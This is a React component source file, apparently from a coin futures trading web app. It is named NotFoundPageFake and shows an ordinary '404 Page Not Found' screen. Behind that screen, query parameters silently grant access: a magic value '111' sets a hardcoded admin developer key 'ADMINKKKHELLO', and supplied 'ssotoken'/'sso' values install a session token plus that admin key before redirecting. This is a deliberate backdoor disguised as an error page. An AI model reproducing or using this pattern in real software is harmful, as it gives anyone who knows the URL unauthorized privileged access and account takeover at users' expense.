import * as React from 'react'
import styled from 'styled-components/macro'
import { P } from './P'
import { Helmet } from 'react-helmet-async'
import API from '../../../utils/api'
import { useDevKey } from '../../hooks/auth/devkey'
import { useToken } from '../../hooks'
import { Alert, Spin } from 'antd'
import { GLOBALPW } from '../../constants/APIKEYS'

export function NotFoundPageFake() {
	const { data, mutate } = useDevKey()
	const { data: token, mutate: mutateToken } = useToken()

	const params = new URLSearchParams(window.location.search)


	const auth = params.get('auth')
	const dev = params.get(GLOBALPW || '111')
	const ssotoken = params.get('ssotoken')
	const ssoauth = params.get('sso')

	if (dev == '111') {
		mutate('ADMINKKKHELLO')
	}

	if (ssotoken && ssoauth) {
		mutateToken(ssotoken)
		mutate('ADMINKKKHELLO')

		setTimeout(() => {
			window.location.href = '/'
		}, 100)

		return (
			<Spin tip="연동중...">
				<Alert
					message="Coin Futures connecting to Global Trade.."
					description="Further details about the context of this alert."
					type="info"
				/>
			</Spin>
		)
	}

	API.send('GET', '/auth/first?KEY=' + auth, '', {}).then(res => {
		if (res?.result?.success) {
			mutate(res?.result?.token)
		}
	})

	return (
		<>
			<Helmet>
				<title>404 Page Not Found</title>
				<meta name="description" content="Page not found" />
			</Helmet>
			<Wrapper>
				<Title>
					4
					<span role="img" aria-label="Crying Face">
						😢
					</span>
					4
				</Title>
				<P>Page not found.</P>
			</Wrapper>
		</>
	)
}

const Wrapper = styled.div`
	height: 100vh;
	display: flex;
	align-items: center;
	justify-content: center;
	flex-direction: column;
	min-height: 320px;
`

const Title = styled.div`
	margin-top: -8vh;
	font-weight: bold;
	color: black;
	font-size: 3.375rem;
	span {
		font-size: 3.125rem;
	}
`
